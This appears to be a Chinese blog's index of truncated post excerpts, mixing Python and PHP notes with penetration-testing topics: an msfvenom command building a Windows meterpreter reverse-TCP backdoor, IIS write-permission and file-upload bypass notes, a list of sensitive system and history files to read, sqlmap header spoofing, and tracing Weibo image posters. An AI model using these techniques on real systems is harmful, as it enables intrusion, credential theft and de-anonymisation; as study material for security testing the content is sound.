拾瑾

摘要： pip-review 基本使用方法： pip install pip-review #查看可更新 pip-review #自动批量升级 pip-review --auto #以交互方式运行，对每个包进行升级 pip-review --interactive 阅读全文

摘要： 1. 制作Windows恶意软件 1.1 使用msfvenom生成后门木马 制作后门程序 sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.142.135 LPORT=44 阅读全文

摘要： zipfile zipfile模块基本使用 #使用 zipfile 压缩文件 import zipfile #创建一个zip文件对象，压缩是需要把mode改为‘w’ zfile=zipfile.ZipFile("test.zip","w") #将文件写入zip文件中，即将文件压缩 zfile.wri 阅读全文

摘要： 关于开启msfconsole遇到数据库连接的问题 首先，确认一下，postgresql 服务是否已经启动。 如未启动，输入 service postgresql start kali用下面这句命令 /etc/init.d/postgresql start 如果不奏效，在msf中直接使用msfdb d 阅读全文

摘要： 原文链接：https://www.cnblogs.com/keta/p/9469417.html 方法1: 用 file_get_contents 以get方式获取内容： <?php $url = 'https://wenda.shukaiming.com/'; echo file_get_cont 阅读全文

摘要： 原文链接：https://www.freebuf.com/vuls/304741.html IIS 6.x 攻防详解 IIS写权限漏洞 开启webDAV引起的IIS写权限漏洞（攻击者可以上传文件） PUT任意上传漏洞 改为允许，并开启脚本资源访问和写入 使用工具已经可以检测出漏洞 修改来宾用户权限 阅读全文

摘要： 文件上传 1. 文件类型检测绕过 1.1. 更改请求绕过 有的站点仅仅在前端检测了文件类型，这种类型的检测可以直接修改网络请求绕过。 同样的，有的站点在后端仅检查了HTTP Header中的信息，比如 Content-Type 等，这种检查同样可以通过修改网络请求绕过。 1.2. Magic检测绕过 阅读全文

摘要： 文件读取 考虑读取可能有敏感信息的文件 用户目录下的敏感文件 .bash_history .zsh_history .profile .bashrc .gitconfig .viminfo passwd 应用的配置文件 /etc/apache2/apache2.conf /etc/nginx/ngi 阅读全文

摘要： 1.设置请求头 --random-agent --user-agent="User-Agent':'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" --user-agent="M 阅读全文

摘要： 通过微博图片链接可以直接找到发图的人 例： 图片地址： https://tvax1.sinaimg.cn/crop.0.0.1080.1080.180/63885668ly8geyrcrw0zjj20u00u0mz6.jpg?KID=imgbed,tva&Expires=1620073273&ssi 阅读全文